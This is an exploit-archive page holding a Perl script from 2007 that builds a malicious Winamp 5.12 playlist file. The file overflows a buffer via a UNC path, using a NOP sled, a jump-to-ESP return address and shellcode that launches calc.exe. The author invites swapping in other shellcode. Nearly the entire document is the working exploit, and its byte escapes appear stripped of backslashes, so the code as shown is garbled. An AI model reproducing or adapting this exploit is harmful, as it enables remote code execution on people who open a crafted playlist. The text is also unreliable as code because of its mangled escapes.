Winamp <= 5.12 (Crafted PLS) Remote Buffer Overflow Exploit (perl)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Winamp <= 5.12 (Crafted PLS) Remote Buffer Overflow Exploit (perl)
# Published : 2007-03-07
# Author : Umesh Wanve
# Previous Title : PHP <= 5.2.0 ext/filter FDF Post Filter Bypass Exploit
# Next Title : mod_security <= 2.1.0 (ASCIIZ byte) POST Rules Bypass Vulnerability

#!/usr/bin/perl -w
# ===============================================================================================
#                Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit
#                               By Umesh Wanve (umesh_345@yahoo.com)
# =========================================================================================================================== 
# Credits : ATmaCA is credited with the discovery of this vulnerability.
#
# Date : 07-03-2007
#
# Tested on Windows 2000 SP4 Server English
#           Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
# 
# Buffer = "x90 x 1023"      +  EIP    
# 
# Desc: you cant put shellcode after EIP. No more space after this. The winamp simply crashes.  When you debug it, you will see that
#   shellcode is 304 bytes away from ESP. So jump to esp + 304 should work. Find such address if u can. 
# 
#
# This was written for educational purpose. Use it at your own risk.Author will be not be responsible for any damage.
#
#
#============================================================================================================================

#jump to shellcode
$jmp="x61xD9x02x02".
	"x83xECx34".                  
	"x83xECx70".                  
	"xFFxE4";                     


#x83xECx34  add esp ,34
#xFFxE4  jump esp

$nop="x90" x 856;

$start= "[playlist]rnFile1=\\";
$end="rnTitle1=Winamp Exploit by UmeshrnLength1=512rnNumberOfEntries=1rnVersion=2rn";

#open calc.exe
$shellcode =
      "x54x50x53x50x29xc9x83xe9xdexe8xffxffxffxffxc0x5ex81x76x0ex02".
      "xddx0ex4dx83xeexfcxe2xf4xfex35x4ax4dx02xddx85x08x3ex56x72x48".
	"x7axdcxe1xc6x4dxc5x85x12x22xdcxe5x04x89xe9x85x4cxecxecxcexd4".
	"xaex59xcex39x05x1cxc4x40x03x1fxe5xb9x39x89x2ax49x77x38x85x12".
	"x26xdcxe5x2bx89xd1x45xc6x5dxc1x0fxa6x89xc1x85x4cxe9x54x52x69".
      "x06x1ex3fx8dx66x56x4ex7dx87x1dx76x41x89x9dx02xc6x72xc1xa3xc6".
	"x6axd5xe5x44x89x5dxbex4dx02xddx85x25x3ex82x3fxbbx62x8bx87xb5".
	"x81x1dx75x1dx6axa3xd6xafx71xb5x96xb3x88xd3x59xb2xe5xbex6fx21".
	"x61xddx0ex4d";


open (MYFILE, '>>poc.pls');

print MYFILE $start;          

print MYFILE $nop;            #856

print MYFILE $shellcode;      #165 

print MYFILE "xCCxCC";      #2 bytes

print MYFILE $jmp;            # EIP    

print MYFILE "x90x90x90x90";

print MYFILE $end;


close (MYFILE);


##############################################################################################3

# www.Syue.com [2007-03-07]